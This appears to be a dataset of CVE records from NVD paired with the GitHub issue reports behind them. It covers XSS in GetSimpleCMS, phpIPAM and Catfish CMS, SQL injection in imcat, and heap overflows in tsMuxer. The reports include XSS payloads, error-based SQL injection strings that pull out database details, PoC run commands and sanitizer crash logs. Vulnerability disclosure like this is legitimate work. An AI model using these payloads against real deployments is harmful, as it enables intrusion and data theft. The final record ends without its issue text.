Hi, I would like to report Cross Site Scripting(XSS) vulnerability in latest release(3.4.0a) admin/snippets.php. Description: Cross-site scripting (XSS) vulnerability in admin/snippets.php url: http://localhost/admin/snippets.php “Add Snippet”, input payload in snippets title payload: `<img src=x onerror=alert(1)> <--xss test` and "Save snippets" ![image](https://user-images.githubusercontent.com/25531497/69916590-d8509b80-1497-11ea-8334-ed03d93bc832.png) Last, visit admin/snippets.php agin. ![image](https://user-images.githubusercontent.com/25531497/69916665-b1469980-1498-11ea-9e16-15ae957cf6bb.png) ![GetSimpleCMS_XSS4](https://user-images.githubusercontent.com/25531497/69916599-f0c0b600-1497-11ea-97d9-335df68875d0.png)
Cross Site Scripting(XSS) Vulnerability in Latest Release 3.4.0a admin/snippets.php
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1322/comments
0
2019-12-01T16:14:31Z
2019-12-01T16:28:06Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1322
530,755,248
1,322
2,098
CVE-2020-20392
2021-06-23T15:15:08.527
SQL Injection vulnerability in imcat v5.2 via the fm[auser] parameters in coms/add_coms.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/peacexie/imcat/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/peacexie/imcat/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:txjia:imcat:5.2:*:*:*:*:*:*:*", "matchCriteriaId": "7FF122D4-70A9-470A-BB74-03CA2508DA8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/peacexie/imcat/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "peacexie", "imcat" ]
Hi, I would like to report Sql injection vulnerability in latest release(v5.2) product reviews(/root/plus/coms/add_coms.php) I found it in the demo(https://imcat.txjia.com/chn.php?crem&pid=2015-9h-n441) Add a product reviews ![imcat1](https://user-images.githubusercontent.com/25531497/89128057-67c9b500-d525-11ea-8eac-e8593e7f4c0d.png) Test the fm[auser] in request body payload: `'and/**/extractvalue('anything',concat('~',(select user())))and'` ![imcat2](https://user-images.githubusercontent.com/25531497/89128094-bbd49980-d525-11ea-95fd-adfc6c4101da.png) payload: `'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'` ![imcat3](https://user-images.githubusercontent.com/25531497/89128097-c000b700-d525-11ea-861c-e621e3494c07.png) payload `'and/**/extractvalue('anything',concat('~',(select database())))and'` ![image](https://user-images.githubusercontent.com/25531497/89128142-11a94180-d526-11ea-94ac-b5182648c035.png)
Sql injection vulnerability in Latest Release v5.2 product reviews
https://api.github.com/repos/peacexie/imcat/issues/5/comments
4
2020-08-02T17:12:20Z
2020-08-29T07:45:54Z
https://github.com/peacexie/imcat/issues/5
671,653,625
5
2,099
CVE-2021-35438
2021-06-23T15:15:08.627
phpIPAM 1.4.3 allows Reflected XSS via app/dashboard/widgets/ipcalc-result.php and app/tools/ip-calculator/result.php of the IP calculator.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpipam/phpipam/issues/3351" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpipam/phpipam/issues/3351" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpipam:phpipam:1.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "7DBADC84-B58D-4CEE-94CC-431A4833DA9D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpipam/phpipam/issues/3351
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "phpipam", "phpipam" ]
verison: 1.4.3 ![image](https://user-images.githubusercontent.com/25179450/122525655-0aaaf500-d04c-11eb-9b0f-3efcfe48f1c0.png) POC:127.0.0.1/24/**/<script>alert(/xss/)</script> Input the POC to IP calculator box and Get an alert box
XSS (reflected) in IP calculator
https://api.github.com/repos/phpipam/phpipam/issues/3351/comments
1
2021-06-18T07:44:36Z
2021-06-18T21:19:48Z
https://github.com/phpipam/phpipam/issues/3351
924,637,114
3,351
2,100
CVE-2020-18657
2021-06-23T19:15:07.923
Cross Site Scripting (XSS) vulnerability in GetSimpleCMS <= 3.3.15 in admin/changedata.php via the redirect_url parameter and the headers_sent function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1310" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/LoRexxar/CVE_Request/blob/master/getsimplecms%20v3.3.15/getsimplecms_before_v3.3.15.md" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.seebug.org/vuldb/ssvid-97929" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1310" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/LoRexxar/CVE_Request/blob/master/getsimplecms%20v3.3.15/getsimplecms_before_v3.3.15.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.seebug.org/vuldb/ssvid-97929" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimplecms:*:*:*:*:*:*:*:*", "matchCriteriaId": "0C0FB623-DB18-4FEA-8BF8-05ED9DC89E2B", "versionEndExcluding": null, "versionEndIncluding": "3.3.15", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1310
[ "Exploit", "Third Party Advisory" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
Some security vulnerabilities in v3.3.15 - any url redirection in function redirect - Limited Reflective xss in function redirect - Reflective xss in /admin/settings.php - Reflective xss in /admin/setup.php the details of these vulnerabilities to see https://github.com/LoRexxar/CVE_Request/blob/master/getsimplecms%20v3.3.15/getsimplecms_before_v3.3.15.md
Some security vulnerabilities in v3.3.15
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1310/comments
2
2019-05-05T09:11:28Z
2024-09-11T12:29:49Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1310
440,421,579
1,310
2,101
CVE-2020-23962
2021-06-23T19:15:08.037
A cross site scripting (XSS) vulnerability in Catfish CMS 4.9.90 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "announcement_gonggao" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xwlrbh/Catfish/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xwlrbh/Catfish/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:catfish-cms:catfish_cms:4.9.90:*:*:*:*:*:*:*", "matchCriteriaId": "7C6A4A76-208B-4F11-B694-8FD2D8A76E8B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xwlrbh/Catfish/issues/7
[ "Exploit", "Third Party Advisory" ]
github.com
[ "xwlrbh", "Catfish" ]
Catfish CMS V 4.9.90 allows XSS via the "announcement" plugin, the parameter "announcement_gonggao" in url http://127.0.0.1/cms/index.php/admin/Index/plugins/plugin/announcement.html set the parameter : announcement_gonggao: "><img src="" onerror = alert(/xsstest/)> open the index page ,the js is run.
XSS in "announcement" plugin
https://api.github.com/repos/xwlrbh/Catfish/issues/7/comments
2
2020-07-08T04:03:53Z
2020-07-16T05:34:07Z
https://github.com/xwlrbh/Catfish/issues/7
652,920,590
7
2,102
CVE-2021-34067
2021-06-23T22:15:08.463
Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/424" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/422/files" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/424" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/422/files" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*", "matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/justdan96/tsMuxer/issues/424
[ "Exploit", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Hi, please see asan output and poc file below. Found by **Cem Onat Karagun of Diesec** System info: Ubuntu 21.04 tsMuxeR version git-f6ab2a2 To run PoC: ``` $ ./tsmuxer crash_2 ``` ``` tsMuxeR version git-f6ab2a2. github.com/justdan96/tsMuxer This HEVC stream doesn't contain fps value. Muxing fps is absent too. Set muxing FPS to default 25.0 value. HEVC manual defined fps doesn't equal to stream fps. Change HEVC fps from 0.181784 to 25 ================================================================= ==2946348==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400001eaf2 at pc 0x00000051552c bp 0x7ffc6a2a1220 sp 0x7ffc6a2a1218 READ of size 4 at 0x60400001eaf2 thread T0 #0 0x51552b in BitStreamWriter::flushBits() /src/build/../tsMuxer/bitStream.h:224:37 #1 0x51552b in HevcUnit::updateBits(int, int, int) /src/build/../tsMuxer/hevc.cpp:85:15 #2 0x5263af in HEVCStreamReader::updateStreamFps(void*, unsigned char*, unsigned char*, int) /src/build/../tsMuxer/hevcStreamReader.cpp:364:10 #3 0x72f351 in MPEGStreamReader::updateFPS(void*, unsigned char*, unsigned char*, int) /src/build/../tsMuxer/mpegStreamReader.cpp:310:9 #4 0x52bfa4 in HEVCStreamReader::checkStream(unsigned char*, int) /src/build/../tsMuxer/hevcStreamReader.cpp:68:17 #5 0x6d0b97 in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:770:21 #6 0x6c7255 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35 #7 0x5df87e in detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34 #8 0x5efd05 in main /src/build/../tsMuxer/main.cpp:698:17 #9 0x7fb676137564 in __libc_start_main csu/../csu/libc-start.c:332:16 #10 0x2ebded in _start (/home/Fuzzer_Instance_49/txmux/tsMuxer/bin/tsMuxeR+0x2ebded) 0x60400001eaf5 is located 0 bytes to the right of 37-byte region [0x60400001ead0,0x60400001eaf5) allocated by thread T0 here: #0 0x39823d in operator new[](unsigned long) (/home/Fuzzer_Instance_49/txmux/tsMuxer/bin/tsMuxeR+0x39823d) #1 0x514859 in HevcUnit::decodeBuffer(unsigned char const*, unsigned char const*) /src/build/../tsMuxer/hevc.cpp:40:19 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/build/../tsMuxer/bitStream.h:224:37 in BitStreamWriter::flushBits() Shadow bytes around the buggy address: 0x0c087fffbd00: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffbd10: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffbd20: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffbd30: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffbd40: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 00 =>0x0c087fffbd50: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00[05]fa 0x0c087fffbd60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fffbd70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fffbd80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fffbd90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fffbda0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2946348==ABORTING ```
heap-buffer-overflow in BitStreamWriter::flushBits
https://api.github.com/repos/justdan96/tsMuxer/issues/424/comments
1
2021-05-22T16:27:48Z
2022-06-23T07:19:19Z
https://github.com/justdan96/tsMuxer/issues/424
898,836,732
424
2,103
CVE-2021-34068
2021-06-23T22:15:08.507
Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/427" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/425/files" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/427" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/425/files" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*", "matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/justdan96/tsMuxer/issues/427
[ "Exploit", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Hi, please see asan output and poc file below. Found by **Cem Onat Karagun of Diesec** System info: ``` Ubuntu 21.04 tsMuxeR version git-f6ab2a2 ``` To run PoC after unzip: ``` $ ./tsmuxer scalable_nesting_poc ``` [scalable_nesting_poc.zip](https://github.com/justdan96/tsMuxer/files/6534179/scalable_nesting_poc.zip) Asan output: ``` tsMuxeR version git-f6ab2a2. github.com/justdan96/tsMuxer ================================================================= ==3847316==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000d517 at pc 0x000000302336 bp 0x7ffcadc46bc0 sp 0x7ffcadc46368 READ of size 16 at 0x60200000d517 thread T0 #0 0x302335 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) (/home/Fuzzer_Instance_11/txmux/tsMuxer/bin/tsMuxeR+0x302335) #1 0x30282a in memcmp (/home/Fuzzer_Instance_11/txmux/tsMuxer/bin/tsMuxeR+0x30282a) #2 0x78171c in SEIUnit::mvc_scalable_nesting(SPSUnit&, unsigned char*, int, int) /src/build/../tsMuxer/nalUnits.cpp:2442:21 #3 0x77edc9 in SEIUnit::deserialize(SPSUnit&, int) /src/build/../tsMuxer/nalUnits.cpp:2015:13 #4 0x4e3408 in H264StreamReader::checkStream(unsigned char*, int) /src/build/../tsMuxer/h264StreamReader.cpp:142:25 #5 0x6ceacc in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:745:21 #6 0x6c7255 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35 #7 0x5df87e in detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34 #8 0x5efd05 in main /src/build/../tsMuxer/main.cpp:698:17 #9 0x7f3c2da0d564 in __libc_start_main csu/../csu/libc-start.c:332:16 #10 0x2ebded in _start (/home/Fuzzer_Instance_11/txmux/tsMuxer/bin/tsMuxeR+0x2ebded) 0x60200000d517 is located 0 bytes to the right of 7-byte region [0x60200000d510,0x60200000d517) allocated by thread T0 here: #0 0x39823d in operator new[](unsigned long) (/home/Fuzzer_Instance_11/txmux/tsMuxer/bin/tsMuxeR+0x39823d) #1 0x74f45d in NALUnit::decodeBuffer(unsigned char const*, unsigned char const*) /src/build/../tsMuxer/nalUnits.cpp:282:19 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/Fuzzer_Instance_11/txmux/tsMuxer/bin/tsMuxeR+0x302335) in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) Shadow bytes around the buggy address: 0x0c047fff9a50: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9a60: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9a70: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9a80: fa fa 00 00 fa fa 01 fa fa fa 04 fa fa fa 04 fa 0x0c047fff9a90: fa fa 01 fa fa fa 04 fa fa fa 04 fa fa fa 00 00 =>0x0c047fff9aa0: fa fa[07]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3847316==ABORTING ```
heap-buffer-overflow in SEIUnit::mvc_scalable_nesting
https://api.github.com/repos/justdan96/tsMuxer/issues/427/comments
0
2021-05-24T18:09:22Z
2022-06-23T07:18:05Z
https://github.com/justdan96/tsMuxer/issues/427
899,885,611
427
2,104
CVE-2021-34069
2021-06-23T22:15:08.547
Divide-by-zero bug in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/428" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/421/files" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/428" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/421/files" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*", "matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "369" ]
369
https://github.com/justdan96/tsMuxer/issues/428
[ "Exploit", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
